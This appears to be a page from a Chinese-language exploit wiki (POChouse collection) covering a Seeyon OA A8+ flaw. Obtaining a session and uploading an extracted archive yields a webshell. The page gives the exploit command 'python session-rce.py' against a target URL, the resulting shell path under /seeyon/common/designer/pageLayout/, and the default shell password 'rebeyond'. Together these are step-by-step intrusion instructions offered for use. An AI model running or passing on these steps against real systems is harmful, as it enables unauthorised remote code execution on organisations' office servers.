menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right [+] 协同办公OA系统 chevron_right Seeyon-致远OA chevron_right Session-任意文件上传
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    致远OA通过发送特殊请求获取session,通过文件上传接口上传压缩包解压后可Getshell

    影响范围

    A8+

    POC

    大宝剑可批量扫描此漏洞,有误报性,配合EXP验证

    EXP

    #脚本在此目录下
python session-rce.py http://192.168.1.100
    Shell地址:/seeyon/common/designer/pageLayout/a234.jspx
默认密码:rebeyond